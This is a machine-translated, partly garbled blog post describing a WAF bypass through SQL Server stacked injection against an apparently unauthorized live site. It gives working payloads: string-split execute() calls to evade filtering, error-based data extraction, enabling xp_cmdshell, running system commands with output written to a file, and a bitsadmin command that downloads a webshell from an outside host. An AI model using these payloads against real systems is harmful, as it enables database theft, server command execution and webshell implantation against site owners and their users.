Shulou(Shulou.com)06/01 Report--

Preface of 0x00

The last bypass was too simple, and there was no ability to annotate the data or obtain permissions. This time, continue to bypass and get the data.

0x01 process

Or the last site, simple judgment, there is injection

Found and numbers, exec, union select, select numbers. Be filtered

It is found that the execute function is not filtered, and the dog does not come out to show that this function can be used.

Execute ('sql statement') / / execute function can write sql statement, and it is a string, then you can pass in some morph strings to bypass waf

Verify it locally.

Some deformation.

It's just that using sql server stack injection this time, the data will not be displayed on the page, so let the stack error this time to achieve the effect of error injection.

Execute ('select convert (int,@@version)')-a

Of course, it needs to be transformed, or it will be intercepted, because of the emergence of select.

Execute ('sel'%2b'ect convert (int,@@version)')-- a / /% 2b is equivalent to + in url coding, so it can be understood as' sel' + 'ect'

Through the execute function, metamorphosis can be made so that waf cannot intercept, making it much easier to get data or execute sql statements

Execute cmdshell, because cmdshell cannot be echoed by reporting an error, but the result can be redirected to a file or written to a table

Execute ('master..xp_cmdshell whoami > e:\'% 2b'\ xx\'% 2b'\ 1.txt') / / the double slash is filtered

It doesn't matter if the error is returned. Waf does not intercept. Check whether 1.txt has data.

0x02 follow-up

I originally wanted to write to webshell or download webshell through the public network, but the server cannot go out to the public network, and there is waf, which leads to the failure of writing shell. After consideration, I want to kill waf, but still avoid affecting the server.

0x03 other

Attach other commands used in this test

Execute ('sp_configure "show advanced options, 1') execute (' reconfigure') execute ('sp_configure" xp_cmdshell ", 1') execute (' reconfigure') / / the above four steps enable xp_cmdshell to open execute ('master..xp_cmdshell" bitsadmin / transfer n http://xxxxx/1.aspx c:\\ path\\ 123.aspx ") / / download webshell from the public network. In this article, the download failed because the machine cannot go out of the public network.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.